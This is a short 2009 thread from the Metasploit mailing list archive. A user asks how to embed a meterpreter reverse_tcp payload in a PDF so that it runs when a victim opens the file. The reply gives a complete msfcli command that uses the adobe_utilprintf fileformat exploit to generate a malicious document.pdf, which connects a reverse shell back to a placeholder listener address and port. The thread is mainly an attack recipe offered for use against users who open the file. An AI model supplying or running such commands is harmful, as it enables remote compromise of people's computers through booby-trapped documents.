Metasploit mailing list archives

is it possible to attach metasploit payloads with pdf


From: m.iodice at gmail.com (Mirko Iodice)
Date: Sat, 28 Mar 2009 09:02:28 +0100

try:

./msfcli exploit/windows/fileformat/adobe_utilprintf
filename=document.pdf payload=windows/meterpreter/reverse_tcp
lhost=x.x.x.x lport=5555 E

2009/3/28 Abhishek Kumar <abhishek.luck at gmail.com>:
hi list,

yesterday i was working around attaching a meterpreter reverse_tcp
payload to a MS word document.
It was simple to do because msfpayload provides payloads in VBA format.

Now,the question is...
is there anything available for pdf files ?
can we embed our payloads with pdf and then wait for the user to click on it ??

regards
abhi
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




-- 
Mirko Iodice


Current thread: